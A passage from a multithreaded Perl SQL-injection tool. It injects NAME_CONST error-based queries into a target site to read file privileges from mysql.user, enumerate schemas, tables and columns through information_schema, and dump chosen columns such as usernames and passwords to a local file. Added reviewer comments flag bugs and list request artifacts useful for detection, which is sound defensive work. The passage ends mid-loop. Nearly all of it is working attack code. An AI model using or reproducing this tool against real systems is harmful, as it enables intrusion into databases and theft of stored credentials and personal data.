  3690.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user" . $nc_plus . "where" . $nc_plus . "user=user)";
  3691.      $nc_start1 = $nc_start . $temp;
  3692.      $nc_midle1 = $nc_midle . $temp;
  3693.      $url10 = $nc_start1 . $nc_midle1 . $nc_end;
  3694.      $nc_start1 = "";
  3695.      $nc_midle1 = "";
  3696.      #####################################################################
  3697.      $thr = $kol_threads; # ???-?? ???????
  3698.      $num = -1; # ?? ????????
  3699.      print "-----------------------------------------\n";
  3700.      print "System information:\n";
  3701.      print "-----------------------------------------\n";
  3702.      print FILE  "-----------------------------------------\n";
  3703.      print FILE  "SQL: $url1\n";
  3704.      print FILE "-----------------------------------------\n";
  3705.      print FILE "System information:\n";
  3706.      print FILE "-----------------------------------------\n";
  3707.      print "Request method - $method\n";
  3708.      print "Threads - $kol_threads\n";
  3709.      print "Proxy - $proxy_message\n";
  3710.      print "----------------------\n";
  3711.      for(0..$thr) {
  3712.         $trl[$_] = threads->create(\&gets111);
  3713.      }
  3714.      for(0..$thr) {
  3715.         $trl[$_]->join;
  3716.      }
             # Thread entry point for NAME_CONST menu item [1] ("system
             # information"); no arguments, no return value.  Each worker claims
             # an index into @array through the shared counter $num, fetches that
             # URL, and prints whatever sits between two "ussr" markers in the
             # response, also appending it to FILE (opened by the caller).
             # scan_url() takes no arguments and presumably reads $current as a
             # global.
  3717.      sub gets111 {
                # NOTE(review): $url11 is not assigned anywhere in the visible
                # code (only $url1..$url10 are built above), so the last slot is
                # undef and one worker ends up calling scan_url() with an
                # undefined $current.
  3718.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  3719.         $size = @array; # element count (scalar assignment)
  3720.         $| = 1; # autoflush for the "\r" progress counter
  3721.         while ($num<$size) {
  3722.             { lock($num);
  3723.             $num++; }
                    # NOTE(review): $num is read outside the lock, so with several
                    # workers an index can be fetched twice or skipped.
  3724.             $current = $array[$num];
  3725.             $content = scan_url();
                    # /g in scalar context on a freshly assigned $content: only
                    # the first marked span per response is taken.  The markers
                    # presumably come from $sql_pref1/$sql_pref2 (set elsewhere).
  3726.             if ($content =~ m/ussr(.*?)ussr/img) {
  3727.                   print $1 . "\n";
  3728.                   print FILE $1 . "\n";
  3729.             }
  3730.             print $num . "\r"; # progress counter
  3731.             sleep $pause; # per-request delay, configured elsewhere
  3732.         }
  3733.      }
  3734.      print "----------\n";
  3735.      print "Saved in " . "z_" . $host . ".txt\n";
  3736.      close(FILE);
  3737.      goto START200;
  3738. }#end 1
  3739. # DB from schemata
  3740. if ($choice == 2) {
  3741.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  3742.      ## ???-?? ?? ? information_schema.schemata ##
  3743.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . "0,1)";
  3744.      $nc_start1 = $nc_start . $temp;
  3745.      $nc_midle1 = $nc_midle . $temp;
  3746.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3747.      $content = scan_url();
  3748.      $bd_num = $content;
  3749.      $bd_num =~ m/ussr(.*?)ussr/img;
  3750.      $bd_num = $1-1;
  3751.      print FILE "-----------------------------------------\n";
  3752.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  3753.      print FILE "-----------------------------------------\n";
  3754.      print "-----------------------------------------\n";
  3755.      print "Data bases in information_schema.schemata - $1\n";
  3756.      print "-----------------------------------------\n";
  3757.      $num = -1; # ?? ????????
  3758.      $thr = $kol_threads; # ???-?? ???????
  3759.      print "Request method - $method\n";
  3760.      print "Threads - $kol_threads\n";
  3761.      print "Proxy - $proxy_message\n";
  3762.      print "----------------------\n";
  3763.      for(0..$thr) {
  3764.          $trl[$_] = threads->create(\&gets5050111);
  3765.      }
  3766.      for(0..$thr) {
  3767.          $trl[$_]->join;
  3768.      }
             # Thread entry point for NAME_CONST menu item [2] (schema names);
             # no arguments, no return value.  Workers share the counter $num
             # and each claims one row offset; $bd_num (the row count computed
             # by the caller, already decremented by one) bounds the loop.
             # $nc_start, $nc_midle, $nc_end, $nc_plus, $sql_pref1, $sql_pref2
             # and $pause are set elsewhere; output goes to STDOUT and to FILE,
             # which the caller opens and closes.
  3769.      sub gets5050111 {
  3770.        $| = 1; # autoflush for the "\r" progress counter
  3771.        while ($num<$bd_num) {
  3772.          { lock($num);
  3773.          $num++; }
                # NOTE(review): $num is read outside the lock when the query is
                # built, so a concurrent increment can duplicate or skip a row.
  3774.          $temp = "(select" . $nc_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3775.          $nc_start1 = $nc_start . $temp;
  3776.          $nc_midle1 = $nc_midle . $temp;
  3777.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3778.          $content = scan_url(); # takes no arguments; presumably reads $current as a global
                # Only the first "ussr"-delimited span of each response is used.
  3779.          if ($content =~ m/ussr(.*?)ussr/img) {
  3780.                   print $1 . "\n";
  3781.                   print FILE $1 . "\n";
  3782.          }
  3783.          print $num . "\r"; # progress counter
  3784.          sleep $pause; # per-request delay, configured elsewhere
  3785.  
  3786.        }
  3787.      }
  3788.     print "----------\n";
  3789.     print "Saved in " . "z_" . $host . ".txt\n";
  3790.     close(FILE);
  3791.     goto START200;
  3792. } # end DB
  3793. # tables from DB from schemata
  3794. if ($choice == 3) {
             # Mode 3: list table names of one operator-supplied database via
             # information_schema.tables.  Same request/response shape as mode 2
             # ("information_schema.tables" in the request, "ussr" markers in the
             # reply); the DB name travels as a 0x-prefixed hex literal, so a
             # "table_schema=0x..." fragment is the artifact to look for.
             # ascii_to_hex: every byte (newline included) becomes two lowercase
             # hex digits, prefixed with "0x".  The same sub is defined again
             # verbatim in later branches; Perl compiles every copy (a
             # "Subroutine redefined" warning is emitted only when warnings
             # are enabled).  The ($) prototype forces scalar context on the
             # single argument.
  3795.      sub ascii_to_hex ($) {
  3796.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3797.             $str = "0x" . $str;
  3798.             return $str;
  3799.      }
  3800.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append results to z_<host>.txt (original comment mis-encoded; wording inferred); open() is not checked
  3801.      print "-----------------------------------------\n";
  3802.      print "Enter the DB-name: ";
  3803.      $choice = <STDIN>;
  3804.      chomp $choice;
  3805.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}   # names containing '-' are wrapped in backticks before any further use
  3806.      print "DB-name: $choice\n";
  3807.      print "----------\n";
  3808.      $choice1 = ascii_to_hex $choice;   # hex form of the (possibly backtick-wrapped) name
  3809.      ## count of tables in the chosen DB (original comment mis-encoded; wording inferred) ##
  3810.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  3811.      $nc_start1 = $nc_start . $temp;
  3812.      $nc_midle1 = $nc_midle . $temp;
  3813.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3814.      $content = scan_url();
  3815.      $bd_num = $content;
  3816.      $bd_num =~ m/ussr(.*?)ussr/img;
  3817.      $bd_num = $1;   # raw count here (mode 2 used count-1); $1 read without a match check
  3818.      print FILE "-----------------------------------------\n";
  3819.      print FILE "Tables in $choice: $bd_num\n";
  3820.      print FILE "-----------------------------------------\n";
  3821.      print "-----------------------------------------\n";
  3822.      print "Tables in $choice: $bd_num\n";
  3823.      print "-----------------------------------------\n";
  3824.      $num = -1; # shared counter; first locked increment yields offset 0 (original comment mis-encoded)
  3825.      $thr = $kol_threads; # number of threads (original comment mis-encoded; wording inferred)
  3826.      print "Request method - $method\n";
  3827.      print "Threads - $kol_threads\n";
  3828.      print "Proxy - $proxy_message\n";
  3829.      print "----------------------\n";
  3830.      for(0..$thr) {   # $kol_threads+1 workers
  3831.          $trl[$_] = threads->create(\&gets5050222);
  3832.      }
  3833.      for(0..$thr) {
  3834.          $trl[$_]->join;
  3835.      }
             # Worker: one information_schema.tables row per iteration.
  3836.      sub gets5050222 {
  3837.        $| = 1;
  3838.        while ($num<$bd_num) {
  3839.          { lock($num);
  3840.          $num++; }
  3841.          $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3842.           $nc_start1 = $nc_start . $temp;
  3843.          $nc_midle1 = $nc_midle . $temp;
  3844.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3845.          $content = scan_url();
  3846.          if ($content =~ m/ussr(.*?)ussr/img) {
  3847.                   print $1 . "\n";
  3848.                   print FILE $1 . "\n";
  3849.          }
  3850.          print $num . "\r";
  3851.          sleep $pause;   # $pause configured elsewhere in the file
  3852.  
  3853.        }
  3854.      }
  3855.     print "----------\n";
  3856.     print "Saved in " . "z_" . $host . ".txt\n";
  3857.     close(FILE);
  3858.     goto START200;
  3859. } # end tables from DB
  3860. # columns tables from tables from DB
  3861. if ($choice == 4) {
             # Mode 4: list column names of one table in one database via
             # information_schema.columns, filtered on both table_name and
             # table_schema (each sent as a 0x hex literal).  Request/response
             # artifacts are the same as in modes 2 and 3.
             # Second verbatim copy of ascii_to_hex (see the copy in the
             # previous branch); byte -> two hex digits, "0x" prefix.
  3862.      sub ascii_to_hex ($) {
  3863.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3864.             $str = "0x" . $str;
  3865.             return $str;
  3866.      }
  3867.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append results to z_<host>.txt (original comment mis-encoded; wording inferred); open() is not checked
  3868.      print "-----------------------------------------\n";
  3869.      print "Enter the DB-name: ";
  3870.      $choice = <STDIN>;
  3871.      chomp $choice;
  3872.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}   # '-' in the name -> backtick-wrapped
  3873.      $choice1 = ascii_to_hex $choice;
  3874.      print "DB-name: $choice\n";
  3875.      print "----------\n";
  3876.      $choice1 = ascii_to_hex $choice;   # recomputed; same value as the assignment three lines up
  3877.      print "-----------------------------------------\n";
  3878.      print "Enter the TABLE-name: ";
  3879.      $choice2 = <STDIN>;
  3880.      chomp $choice2;
  3881.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  3882.        $choice3 = ascii_to_hex $choice2;   # hex form of the table name
  3883.      print "TABLE-name: $choice2\n";
  3884.      print "----------\n";
             # Column count for (table_schema, table_name).
  3885.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  3886.      $nc_start1 = $nc_start . $temp;
  3887.      $nc_midle1 = $nc_midle . $temp;
  3888.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3889.        $content = scan_url();
  3890.      $bd_num = $content;
  3891.      $bd_num =~ m/ussr(.*?)ussr/img;
  3892.      $bd_num = $1;   # $1 read without a match check
  3893.      print FILE "-----------------------------------------\n";
  3894.      print FILE "Columns in [$choice.$choice2]: $bd_num\n";
  3895.      print FILE "-----------------------------------------\n";
  3896.      print "-----------------------------------------\n";
  3897.      print "Columns in [$choice.$choice2]: $bd_num\n";
  3898.      print "-----------------------------------------\n";
  3899.      $num = -1; # shared counter; first locked increment yields offset 0 (original comment mis-encoded)
  3900.      $thr = $kol_threads; # number of threads (original comment mis-encoded; wording inferred)
  3901.      print "Request method - $method\n";
  3902.      print "Threads - $kol_threads\n";
  3903.      print "Proxy - $proxy_message\n";
  3904.      print "----------------------\n";
  3905.      for(0..$thr) {   # $kol_threads+1 workers
  3906.          $trl[$_] = threads->create(\&gets5050333);
  3907.      }
  3908.      for(0..$thr) {
  3909.          $trl[$_]->join;
  3910.      }
             # Worker: one information_schema.columns row per iteration.
  3911.      sub gets5050333 {
  3912.        $| = 1;
  3913.        while ($num<$bd_num) {
  3914.          { lock($num);
  3915.          $num++; }
  3916.          $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3917.           $nc_start1 = $nc_start . $temp;
  3918.          $nc_midle1 = $nc_midle . $temp;
  3919.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3920.          $content = scan_url();
  3921.          if ($content =~ m/ussr(.*?)ussr/img) {
  3922.                   print $1 . "\n";
  3923.                   print FILE $1 . "\n";
  3924.          }
  3925.          print $num . "\r";
  3926.          sleep $pause;   # $pause configured elsewhere in the file
  3927.  
  3928.        }
  3929.      }
  3930.     print "----------\n";
  3931.     print "Saved in " . "z_" . $host . ".txt\n";
  3932.     close(FILE);
  3933.     goto START200;
  3934. } # end columns tables from tables from DB
  3935. if ($choice==5) {
             # Mode 5: list every table name visible in information_schema.tables
             # (no schema filter), optionally restricted to a 1-based
             # START..END window entered by the operator.
             # Third verbatim copy of ascii_to_hex; it is not called in this
             # branch.
  3936.      sub ascii_to_hex ($) {
  3937.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3938.             $str = "0x" . $str;
  3939.             return $str;
  3940.      }
  3941.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append results to z_<host>.txt (original comment mis-encoded; wording inferred); open() is not checked
  3942.      ## count of rows in information_schema.tables (original comment mis-encoded; wording inferred) ##
  3943.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . "0,1)";
  3944.      $nc_start1 = $nc_start . $temp;
  3945.      $nc_midle1 = $nc_midle . $temp;
  3946.      $url11 = $nc_start1 . $nc_midle1 . $nc_end;
  3947.      $current = $url11;   # $url11 is only used as the source of $current here
  3948.      $content = scan_url();
  3949.      $tab_num = $content;
  3950.      $tab_num =~ m/ussr(.*?)ussr/img;
  3951.      $tab_num = $1-1; # last 0-based offset (original comment mis-encoded; "number of tables in information_schema" inferred); $1 read without a match check
  3952.      print "-----------------------------------------\n";
  3953.      print "Tables in information_schema.tables - $1\n";
  3954.      print "-----------------------------------------\n";
  3955.      ## start from2 ##
  3956.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  3957.      $choice = <STDIN>;
  3958.      chomp $choice;
  3959.      $thr = $kol_threads; # number of threads (original comment mis-encoded; wording inferred)
  3960.      if ($choice == 1) {
  3961.           $num = -1; # full range: first locked increment yields offset 0 (original comment mis-encoded)
  3962.      } else {
                  # Operator window: START is 1-based, so START-2 makes the first
                  # increment land on 0-based offset START-1; END-1 is the last
                  # 0-based offset.
  3963.           print "Enter START_position: ";
  3964.           $choice1 = <STDIN>;
  3965.           chomp $choice1;
  3966.           $num = $choice1-2;
  3967.           print "Enter END_position: ";
  3968.           $choice2 = <STDIN>;
  3969.           chomp $choice2;
  3970.           $tab_num = $choice2-1;
  3971.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  3972.      }
  3973.      print "-----------------------------------------\n";
  3974.      ## end from2
  3975.      print FILE  "-----------------------------------------\n";
  3976.      print FILE  "Tables in information_schema.tables - $1\n";   # $1 may have been reset by the "-" matches in between; value not re-checked here
  3977.      print FILE  "-----------------------------------------\n";
  3978.      print "Request method - $method\n";
  3979.      print "Threads - $kol_threads\n";
  3980.      print "Proxy - $proxy_message\n";
  3981.      print "----------------------\n";
  3982.      for(0..$thr) {   # $kol_threads+1 workers
  3983.          $trl[$_] = threads->create(\&gets112);
  3984.      }
  3985.      for(0..$thr) {
  3986.          $trl[$_]->join;
  3987.      }
             # Worker: one information_schema.tables row per iteration.
  3988.      sub gets112 {
  3989.        $| = 1;
  3990.        while ($num<$tab_num) {
  3991.          { lock($num);
  3992.          $num++; }
  3993.          $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3994.          $nc_start1 = $nc_start . $temp;
  3995.          $nc_midle1 = $nc_midle . $temp;
  3996.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3997.          $content = scan_url();
  3998.          if ($content =~ m/ussr(.*?)ussr/img) {
  3999.                   print $1 . "\n";
  4000.                   print FILE $1 . "\n";
  4001.          }
  4002.          print $num . "\r";
  4003.          sleep $pause;   # $pause configured elsewhere in the file
  4004.  
  4005.        }
  4006.      }
  4007.     print "----------\n";
  4008.     print "Saved in " . "z_" . $host . ".txt\n";
  4009.     close(FILE);
  4010.     goto START200;
  4011. }#end 2
  4012. if ($choice==6) {
            # Mode 6: for an operator-supplied table name, look up its schema in
            # information_schema.tables, count its columns in
            # information_schema.columns, then list the column names.  Sets
            # $full_table_name, which mode 7 below offers to reuse.
            # ascii_to_hex is not defined in this branch; because named subs
            # are compiled before runtime it is the same global sub defined in
            # the surrounding branches.
  4013.     open( FILE, ">>" . "z_" .$host . ".txt" ); # append results to z_<host>.txt (original comment mis-encoded; wording inferred); open() is not checked
  4014.     print "-----------------------------------------\n";
  4015.     print "Enter the table_name: ";
  4016.     $choice = <STDIN>;
  4017.     chomp $choice;
  4018.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}   # '-' in the name -> backtick-wrapped
  4019.     print "Table: $choice\n";
  4020.     print "----------\n";
  4021.     print FILE  "-----------------------------------------\n";
  4022.     print FILE  "Table [ $choice ]\n";
  4023.     print FILE  "-----------------------------------------\n";
  4024.     $choice1 = ascii_to_hex $choice;   # hex literal of the table name used in both WHERE clauses below
            # Query 1: which schema owns this table (first match only).
  4025.     $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  4026.     $nc_start1 = $nc_start . $temp;
  4027.     $nc_midle1 = $nc_midle . $temp;
  4028.     $current = $nc_start1 . $nc_midle1 . $nc_end;
  4029.     $content = scan_url();
  4030.     $prefix = $content;
  4031.     $prefix =~ m/ussr(.*?)ussr/img;
  4032.     $prefix = $1; # schema that owns the table (original comment mis-encoded; wording inferred); $1 read without a match check
  4033.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  4034.     print "Database for $choice: $prefix\n";
  4035.     print FILE  "Database for $choice: $prefix\n";
            # Query 2: column count.  Unlike the other count queries in this
            # file it is not parenthesised and carries no LIMIT clause.
  4036.     $temp = "select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1;
  4037.     $nc_start1 = $nc_start . $temp;
  4038.     $nc_midle1 = $nc_midle . $temp;
  4039.     $current = $nc_start1 . $nc_midle1 . $nc_end;
  4040.     $content = scan_url();
  4041.     $colum_number = $content;
  4042.     $colum_number =~ m/ussr(.*?)ussr/img;
  4043.     $colum_number = $1; # number of columns in the table (original comment mis-encoded; wording inferred)
  4044.     $full_table_name = $prefix . "." . $choice;   # "<schema>.<table>", reused by mode 7
  4045.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
  4046.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
  4047.     print "----------\n";
  4048.     ## list the columns (original comment mis-encoded; wording inferred) ##
  4049.     $thr = $kol_threads; # number of threads (original comment mis-encoded; wording inferred)
  4050.     $num = -1; # shared counter; first locked increment yields offset 0 (original comment mis-encoded)
  4051.     print "Request method - $method\n";
  4052.     print "Threads - $kol_threads\n";
  4053.     print "Proxy - $proxy_message\n";
  4054.     print "----------------------\n";
  4055.     print FILE  "Columns in " . $full_table_name . "\n";
  4056.     for(0..$thr) {   # $kol_threads+1 workers
  4057.          $trl[$_] = threads->create(\&gets113);
  4058.     }
  4059.     for(0..$thr) {
  4060.          $trl[$_]->join;
  4061.     }
            # Worker: one information_schema.columns row per iteration
            # (filtered on table_name only, not on the schema found above).
  4062.     sub gets113 {
  4063.        $| = 1;
  4064.        while ($num<$colum_number) {
  4065.          { lock($num);
  4066.          $num++; }
  4067.          $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)" ;
  4068.          $nc_start1 = $nc_start . $temp;
  4069.          $nc_midle1 = $nc_midle . $temp;
  4070.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  4071.          $content = scan_url();
  4072.          if ($content =~ m/ussr(.*?)ussr/img) {
  4073.                   print "   " . $1 . "\n";
  4074.                   print FILE "  "  . $1 . "\n";
  4075.          }
  4076.          print $num . "\r";
  4077.          sleep $pause;   # $pause configured elsewhere in the file
  4078.  
  4079.        }
  4080.     }
  4081.     print FILE "----------\n";
  4082.     print "----------\n";
  4083.     print "Saved in " . "z_" . $host . ".txt\n";
  4084.     close(FILE);
  4085.     goto START200;
  4086. }# end 3
  4087. if ($choice==7) {
            # Mode 7: dump one or more columns of a table, row by row, joined
            # with ':' (concat_ws(0x3a, ...)), optionally with a single
            # operator-typed WHERE condition and an optional START..END window.
            # Detection artifacts in the requests: the "concat_ws(0x3a" literal,
            # a LIMIT <n>,1 that increments across a burst of requests, and
            # 0x hex literals for identifiers; the "ussr" markers in responses.
            # Fourth verbatim copy of ascii_to_hex (byte -> two hex digits,
            # "0x" prefix); used here for table names and string conditions.
  4088.     sub ascii_to_hex ($) {
  4089.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  4090.                $str = "0x" . $str;
  4091.              return $str;
  4092.     }
  4093.     open( FILE, ">>" . "z_" .$host . ".txt" ); # append results to z_<host>.txt (original comment mis-encoded; wording inferred); open() is not checked
            # Table selection.  The if/else arms are near-identical: the first
            # additionally offers to reuse $full_table_name left by mode 6.
            # In both, answering 1 to "MySQL>=5" resolves the owning schema
            # through information_schema.tables and prefixes it to the name.
  4094.     if ($full_table_name) {
  4095.        print "-----------------------------------------\n";
  4096.        print "Use last parsed table: $full_table_name ? (1/0): ";
  4097.        $choice = <STDIN>;
  4098.        chomp $choice;
  4099.        if ($choice==1) {
  4100.              $table_name = $full_table_name;
  4101.              print "Table: $table_name\n";
  4102.              print "----------\n";
  4103.        } else {
  4104.              print "-----------------------------------------\n";
  4105.              print "Enter the table_name: ";
  4106.              $choice = <STDIN>;
  4107.              chomp $choice;
  4108.              if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}   # '-' in the name -> backtick-wrapped
  4109.              $table_name = $choice;
  4110.              print "-----------------------------------------\n";
  4111.              print "MySQL>=5 or MySql<5? (1/0): ";
  4112.              $choice = <STDIN>;
  4113.              chomp $choice;
  4114.              if ($choice == 1) {
  4115.                   $choice1 = ascii_to_hex $table_name;
  4116.                   $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  4117.                   $nc_start1 = $nc_start . $temp;
  4118.                   $nc_midle1 = $nc_midle . $temp;
  4119.                   $current = $nc_start1 . $nc_midle1 . $nc_end;
  4120.                   $content = scan_url();
  4121.                   $prefix = $content;
  4122.                   $prefix =~ m/ussr(.*?)ussr/img;
  4123.                   $prefix = $1; # schema that owns the table (original comment mis-encoded; wording inferred); $1 read without a match check
  4124.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  4125.                   $table_name = $prefix . "." . $table_name;
  4126.              }
  4127.              print "Table: $table_name\n";
  4128.              print "----------\n";
  4129.        }
  4130.     } else {
  4131.        print "-----------------------------------------\n";
  4132.        print "Enter the table_name: ";
  4133.        $choice = <STDIN>;
  4134.        chomp $choice;
  4135.        if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  4136.        $table_name = $choice;
  4137.        print "-----------------------------------------\n";
  4138.        print "MySQL>=5 or MySql<5? (1/0): ";
  4139.        $choice = <STDIN>;
  4140.        chomp $choice;
  4141.        if ($choice == 1) {
  4142.                   $choice1 = ascii_to_hex $table_name;
  4143.                   $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  4144.                   $nc_start1 = $nc_start . $temp;
  4145.                   $nc_midle1 = $nc_midle . $temp;
  4146.                   $current = $nc_start1 . $nc_midle1 . $nc_end;
  4147.                   $content = scan_url();
  4148.                   $prefix = $content;
  4149.                   $prefix =~ m/ussr(.*?)ussr/img;
  4150.                   $prefix = $1; # schema that owns the table (original comment mis-encoded; wording inferred)
  4151.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  4152.                   $table_name = $prefix . "." . $table_name;
  4153.        }
  4154.        print "Table: $table_name\n";
  4155.        print "----------\n";
  4156.     }
  4157.     print "-----------------------------------------\n";
  4158.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  4159.     $choice = <STDIN>;
  4160.     chomp $choice;
  4161.     $column_name = $choice;   # inserted into the query exactly as typed (comma list expected)
  4162.     print FILE  "-----------------------------------------\n";
  4163.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  4164.     print FILE  "-----------------------------------------\n";
  4165.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  4166.     print "-----------------------------------------\n";
  4167.     print "Do you want add condition to sql-query?\n";
  4168.     print "----------\n";
  4169.     print "for example - where id=1 ? (1/0): ";
  4170.     $choice = <STDIN>;
  4171.     chomp $choice;
  4172.     if ($choice==1) {
  4173.         print "-----------------------------------------\n";
  4174.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  4175.         print "----------\n";
  4176.         $choice = <STDIN>;
  4177.         chomp $choice;
  4178.         $where = $choice;
  4179.         # check (original comment mis-encoded; wording inferred): split on the
                # first '=' and, if the right-hand side is not purely digits,
                # replace it with its 0x hex literal so no quotes are needed.
  4180.         ($con,$whe) = split(/=/,$where);
  4181.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
  4182.         print "Your condition: [ where $where ]\n";
  4183.         $condition=1;
  4184.     } else {
  4185.         $condition=0;
  4186.     }
  4187.     if ($condition==0) {
  4188.          print "----------\n";
  4189.          ## count rows of the table (original comment mis-encoded; wording inferred) #
  4190.          print "Count data from [ $table_name  ]\n";
  4191.          $temp = "(select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "limit" . $nc_plus . "0,1)";
  4192.          $nc_start1 = $nc_start . $temp;
  4193.          $nc_midle1 = $nc_midle . $temp;
  4194.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  4195.          $content = scan_url();
  4196.          $column_name_p = $content;
  4197.          $column_name_p =~ m/ussr(.*?)ussr/img;
  4198.          $column_name_p = $1; # row count; despite its name this variable is the loop's upper bound (original comment mis-encoded)
  4199.          print "$column_name_p\n";
  4200.          print "----------\n";
  4201.          ## start from2 ##
  4202.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  4203.          $choice = <STDIN>;
  4204.          chomp $choice;
  4205.          $thr = $kol_threads; # number of threads (original comment mis-encoded; wording inferred)
  4206.          if ($choice == 1) {
  4207.               $num = -1; # full range: first locked increment yields offset 0 (original comment mis-encoded)
  4208.          } else {
                      # 1-based START/END window -> 0-based offsets START-1 .. END-1.
  4209.               print "Enter START_position: ";
  4210.               $choice1 = <STDIN>;
  4211.               chomp $choice1;
  4212.               $num = $choice1-2;
  4213.               print "Enter END_position: ";
  4214.               $choice2 = <STDIN>;
  4215.               chomp $choice2;
  4216.               $column_name_p = $choice2-1;
  4217.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  4218.          }
  4219.          print "-----------------------------------------\n";
  4220.          print "Request method - $method\n";
  4221.          print "Threads - $kol_threads\n";
  4222.          print "Proxy - $proxy_message\n";
  4223.          print "----------------------\n";
  4224.          ## end from2
  4225.          ## fetch rows from the table (original comment mis-encoded; wording inferred) ##
  4226.          for(0..$thr) {   # $kol_threads+1 workers
  4227.              $trl[$_] = threads->create(\&gets114);
  4228.          }
  4229.          for(0..$thr) {
  4230.              $trl[$_]->join;
  4231.          }
                 # Worker (no condition): one row per iteration, columns joined by ':'.
  4232.          sub gets114 {
  4233.             $| = 1;
  4234.             while ($num<$column_name_p) {
  4235.                { lock($num);
  4236.                $num++; }
